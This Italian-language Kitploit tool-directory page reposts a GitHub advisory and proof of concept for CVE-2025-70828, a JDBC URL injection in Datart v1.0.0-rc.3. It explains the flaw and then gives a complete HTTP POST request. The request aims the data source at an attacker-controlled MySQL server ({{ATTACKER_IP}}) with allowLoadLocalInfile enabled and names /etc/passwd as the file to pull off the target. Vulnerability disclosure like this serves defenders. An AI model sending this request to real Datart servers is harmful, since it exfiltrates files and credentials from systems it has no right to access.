Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-70828 — Datart v1.0.0-rc.3 Iniezione della stringa di connessione JDBC che consente la lettura arbitraria di file | Kitploit
Strumenti/GitHubGitHub/xiaoxiaoranxxx/cve-2025-70828
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubxiaoxiaoranxxx/cve-2025-70828

CVE-2025-70828

Datart v1.0.0-rc.3 Iniezione della stringa di connessione JDBC che consente la lettura arbitraria di file

Vedi Repository
46 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-70828

Riepilogo

È stata scoperta una vulnerabilità di lettura arbitraria dei file in Datart v1.0.0-rc.3. L'applicazione non valida correttamente l'URL di connessione JDBC durante la configurazione dell'origine dati.

Dettagli della vulnerabilità

Tipo di vulnerabilità: Validazione impropria dell'input (CWE-20) / Lettura arbitraria dei file Versione interessata: Datart v1.0.0-rc.3 Gravità: Alta (potenziale divulgazione di informazioni sensibili)

Descrizione

La vulnerabilità è presente nel modulo di configurazione dell'origine dati. L'applicazione non sanifica rigorosamente il parametro url nella configurazione JDBC. Un attaccante remoto con i privilegi per configurare le origini dati può iniettare parametri dannosi (in particolare allowLoadLocalInfile=true) nell'URL JDBC.

Indirizzando la connessione JDBC verso un server MySQL dannoso controllato dall'attaccante (Rogue MySQL Server), l'attaccante può indurre il client a inviare file locali dal server Datart al proprio server.

Impatto

Lo sfruttamento riuscito consente a un attaccante autenticato di leggere file arbitrari dal file system del server (ad esempio , file di configurazione, codice sorgente), potenzialmente portando alla compromissione del server o ad attacchi successivi.

/etc/passwd

Proof of Concept (PoC)

  1. Configurazione: L'attaccante configura un server MySQL dannoso in grado di sfruttare la funzionalità LOAD DATA LOCAL INFILE (ad esempio utilizzando strumenti come rogue_mysql_server).
  2. Sfruttamento: L'attaccante invia la seguente richiesta al server Datart per testare la connessione:
root@kitploit:~
POST /api/v1/data-provider/test HTTP/1.1
Host: {{TARGET_HOST}}
Content-Type: application/json
Authorization: Bearer {{VALID_JWT_TOKEN}}
Accept: application/json

{
  "name": "cve-poc-test",
  "type": "JDBC",
  "properties": {
    "dbType": "MYSQL",
    "url": "jdbc:mysql://{{ATTACKER_IP}}:{{ATTACKER_PORT}}/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360",
    "user": "fileread_/etc/passwd",
    "password": "any_password",
    "driverClass": "com.mysql.cj.jdbc.Driver",
    "serverAggregate": false,
    "enableSpecialSQL": false,
    "enableSyncSchemas": true,
    "syncInterval": "60",
    "properties": {}
  }
}
Scarica lo strumento